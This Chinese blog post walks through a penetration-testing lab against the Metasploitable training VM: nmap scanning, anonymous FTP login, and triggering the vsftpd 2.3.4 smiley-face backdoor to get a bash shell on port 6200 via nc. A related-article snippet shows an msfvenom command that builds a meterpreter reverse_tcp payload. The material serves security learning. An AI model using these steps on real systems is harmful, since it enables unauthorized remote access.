Metasploitable靶机渗透

最新推荐文章于 2023-07-20 03:10:31 发布
最新推荐文章于 2023-07-20 03:10:31 发布
阅读量2.9k 收藏 8
点赞数 1
文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51926773/article/details/121085577
版权

一.导入命令ifconfig得到自己的本机ip(即攻击机)

 

二.在kali打开nmap,输入自己的本机ip范围,得到在同一局域网的内存活的主机。

 在这里能看到21(ftp)端口,图片显示。目标就是21端口和6200端口。

三,接下来对靶场机器进行探测,我们使用nmap命令 nmap -sV ip/24,得到目标靶机ip

 

四,.匿名用户登录

 USER/PASS 输入用户名(anonymous)/密码任意输入,通过匿名用户名,任意设置的密码成功登录靶机。输入HELP查看,可以输入被识别的命令。

6.使用nmap扫描FTP后门漏洞

 

7.使用nc触发vsftpd-2.3.4后面漏洞

 

 

8.另外打开一个终端利用该漏洞

 

 nc已经成功登录靶机的bash,可以输入linux命令。
nc 靶机ip地址 端口号
vsftpd手工出发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。
6200端口 默认没有开启的,从确认靶机IP的扫描信息就可以看出。

鸿^
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploitable3靶机
05-09
Metasploitable3是一个win2008的靶机---Metasploitable 3简介 Metasploitable 3 内置一些安全机制,比如防火墙,权限设置等。此外,Metasploitable 3中有些漏洞在 Metasploit 中并没有漏洞利用模块,需要手工挖掘。...
Metasploitable2靶机渗透学习
m0_65712192的博客
05-19 4807
Metasploitable2靶机渗透学习
看完这篇 教你玩转渗透测试靶机——Metasploitable2
weixin_54626591的博客
07-19 458
看完这篇 教你玩转渗透测试靶机——Metasploitable2
Metasploitable2靶机渗透笔记
最新发布
qq_60600840的博客
07-20 583
metaspolitable靶机安全渗透靶机
metasploitable2靶机
雨泽网络工作室
08-16 4611
一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。 使用方法
通过metasploit工具渗透Metasploitable 2靶机
热门推荐
朝歌
04-24 1万+
    首先,是Metasploitable 2的在本地的安装,    下载地址:https://sourceforge.net/projects/metasploitable/?source=typ_redirect。下载过后解压。会有四个文件。            用VM打开.vmsd文件。如果遇见需要配置文件什么的,就用VM打开vmx文件。        就会显示下面:打开虚拟机账号密码都...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
metasploitable-linux VMware镜像
03-09
安全测试靶机虚拟镜像,仅做安全测试学习使用
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
Kali渗透测试-远程控制:6200端口变成“后门”
Liu_Bruce的博客
05-06 2977
Kali渗透测试-远程控制:6200端口变成“后门” 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机Metasploitable2 - Linux (IP:192.168.68.205) 攻击工具:Netcat(nc) “瑞士军刀” 扫描工具:Nmap version 7.92 漏洞是黑客进入计算机的入口,如果目标主机上运行的vsftpd-2.3.4被黑客使用笑脸漏洞成功渗透,就会自动在6200
Metasploit渗透测试(获取靶机控制权)
qq_51926773的博客
11-07 475
一,打开kali生成一个被控端: 输入命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=目标IP lport=5000 -f exe -o /root/payload.exe 这是你会发现你的kali会多出一个文件: 二,然后在kali输入msfconsole: 然后输入set payload windows/meterpreter/reverse_tcp,回车zai 再输入set lhost 靶机ip ...
20169219 Nmap扫描实验
weixin_30315435的博客
04-26 180
提交用 namp 对Windows 靶机,SEED靶机Linux靶机的扫描的命令和结果进行截图 一、首先分析Linux靶机Metasploitable 扫描Metasploitableb靶机 扫描Metasploitableb靶机的操作系统 扫描开放的UDP端口 操作系统版本 二、Windows靶机靶机的ip地址 扫描开放的网络服务及版本,可以看到开放的网络服务有ftp、smtp...
MetasploitHash传递渗透
a1b2c3是弱口令
12-06 3049
讲述Metasploit知道内网机器密码或者是不知道密码能够拿到shell获取hash值的两种渗透测试。 测试环境 目标机: Windows 7 Ultimate 192.168.1.9 攻击机: Linux 4.6.0-kali1-amd64 192.168.1.31 I HAVE PASS 攻击机姿势: msfconsole use exploit/windows/smb/psex...
无线网络渗透测试系列学习(二) - 在VMware中搭建Metasploit靶机的详细步骤以及端口的简单了解
曾铎的博客
03-10 2476
这篇文章主要介绍了在VMware中搭建Metasploit 2靶机的过程,和对计算机网络中端口概念的简单了解,罗列常用端口,以便后期回顾,下一篇文章将会讲述网络扫描的基础技术。
metasploitable2靶场漏洞总结(部分)
leavrow的博客
08-17 2538
部分metasploitable2渗透靶场漏洞,有很多漏洞都过时了
进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器
weixin_43263566的博客
01-06 6336
Kali最强渗透工具- metasploit
构建Metasploitable 靶场环境
cmcaimao的博客
04-17 1809
原文地址:https://github.com/rapid7/metasploitable3 Metasploitable3 Metasploitable3是从头开始构建的VM,具有大量安全漏洞。它旨在用作测试metasploit漏洞的目标。 Metasploitable3是在BSD风格的许可证下发布的。有关更多详细信息,请参见复制。 快速开始 要使用https://app.vag...
metasploitable2靶机安装
03-16
Metasploitable2是一款用于漏洞测试和渗透测试的虚拟机,它包含了许多已知的漏洞和弱点,可以用于测试安全工具和技术的有效性。安装Metasploitable2需要先下载虚拟机镜像文件,然后使用虚拟化软件(如VMware、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值